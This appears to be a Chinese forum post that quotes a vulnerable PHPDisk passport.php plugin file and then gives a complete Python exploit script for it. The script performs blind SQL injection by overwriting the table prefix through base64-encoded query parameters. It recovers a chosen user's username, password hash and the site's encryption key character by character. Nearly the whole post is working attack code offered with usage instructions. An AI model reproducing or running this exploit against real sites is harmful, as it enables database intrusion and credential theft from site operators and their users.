TA的每日心情 | 怒
2024-12-14 22:22 |
|---|
签到天数: 1631 天 [LV.Master]伴坛终老
|
文件 plugins\phpdisk_client\passport.php
- $str = $_SERVER['QUERY_STRING'];
- if($str){
- parse_str(base64_decode($str));// 触发函数
- }else{
- exit('Error Param');
- }
- /*$username = trim(gpc('username','G',''));
- $password = trim(gpc('password','G',''));
- $sign = trim(gpc('sign','G',''));*/
- if($sign!=strtoupper(md5($action.$username.$password))){
- exit('No data,Code:2!');
- }
- $username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;
- if($action=='passportlogin'){
- $rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1"); //覆盖tpf
- #===============================================================================
- # Id :phpdisk.y
- # Author:Yaseng
- #===============================================================================
- import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
-
- def cslogo():
- print '''
- ___ ___ ____ ____ ____ __ __ _ _
- / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
- ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
- \___)\___/(____/(____)(__) (____)(__)(__)(__)
- Name:phpdisk bind sql injection exploit
- Author:Yaseng [yaseng@uauc.net]
- Usage:phpdisk.py site[www.yaseng.me] id[1]
- '''
-
- # show message
- def msg(text, type=0):
- if type == 0:
- str_def = "[*]"
- elif type == 1:
- str_def = "[+]"
- else:
- str_def = "[-]";
- print str_def + text;
-
- # get url data
- def get_data(url):
- try:
- r = urllib2.urlopen(url, timeout=10)
- return r.read()
- except :
- return 0
- def b(url):
- if get_data(url).find("ssport Err",0) != -1 :
- return 0
- return 1
-
- def make_plyload(payload):
- return target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())
-
- def get_username():
-
- msg("get username ...")
- global pass_list
- len=0
- for i in range(40) :
- if b(make_plyload("pd_users WHERE 1 and (SELECT LENGTH(username) from pd_users where userid=%d )= %d #" % (uid,i))):
- len=i
- msg("username length:%d" % len,1)
- break
- global key_list
- key_list=['0','1','2','3','4','5','6','7','8','9']
- key_list+=map(chr,range(97,123))
- username=""
- for i in range(len) :
- for key in key_list :
- t=key
- if type(key) != int :
- t="0x"+binascii.hexlify(key)
- if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(username,%d,1) from pd_users where userid=%d )=%s #" % (i+1,uid,t)))) :
- msg("username [%d]:%s" % (i+1,key))
- username+=key
- break
- msg("username:"+username,1)
- return username
-
- def get_password():
-
- pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
- password=""
- for i in range(32) :
- for key in pass_list :
- t=key
- if type(key) != int :
- t="0x"+binascii.hexlify(key)
- if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(password,%d,1) from pd_users where userid=%d )= %s #" % (i+1,uid,t)))) :
- msg("password [%d]:%s" % (i+1,key))
- password+=key
- break
- msg("username:"+password,1)
- return password
-
- def get_encrypt_key():
-
- msg("get encrypt_key ...")
- global pass_list
- pass_list=map(chr,range(97,123))
- len=0
- for i in range(40) :
- if b(make_plyload("pd_users WHERE 1 and ( SELECT LENGTH(value) from pd_settings where vars=0x656e63727970745f6b6579 )=%d #23" % i)):
- len=i
- msg("encrypt_key length:%d" % len,1)
- break
- global key_list
- key_list=['0','1','2','3','4','5','6','7','8','9']
- key_list+=map(chr,range(65,91)+range(97,123))
- encrypt_key=""
- for i in range(len) :
- for key in key_list :
- t=key
- if type(key) != int :
- t="0x"+binascii.hexlify(key)
- if(b(make_plyload(" pd_users WHERE 1 and ( SELECT binary(substr(value,%d,1)) from pd_settings where vars=0x656e63727970745f6b6579 ) = %s #" % (i+1,t)))) :
- msg("key [%d]:%s" % (i+1,key))
- encrypt_key+=key
- break
- msg("encrypt_key:"+encrypt_key,1)
- return encrypt_key
-
- if __name__ == '__main__':
-
- cslogo()
- if len(sys.argv) > 1 :
- site=sys.argv[1];
- global target
- global uid
- try :
- uid=int(sys.argv[2]);
- except :
- uid =1
- target=site+"/plugins/phpdisk_client/passport.php"
- msg("exploit:"+site)
- #print get_data(make_plyload(" pd_users WHERE 1 and ( SELECT substr(value,2,1) from pd_settings where vars=0x656e63727970745f6b6579 ) = 9 %23"))
- if get_data(target) :
- username=get_username()
- if len(username) > 0 :
- password=get_password()
- if len(password) == 32 :
- msg("Succeed: username:%s password:%s" % (username,password),1)
- else :
- msg("vulnerability not exits",2);
- exit();
|
|
发表于 2013-8-28 10:22:24
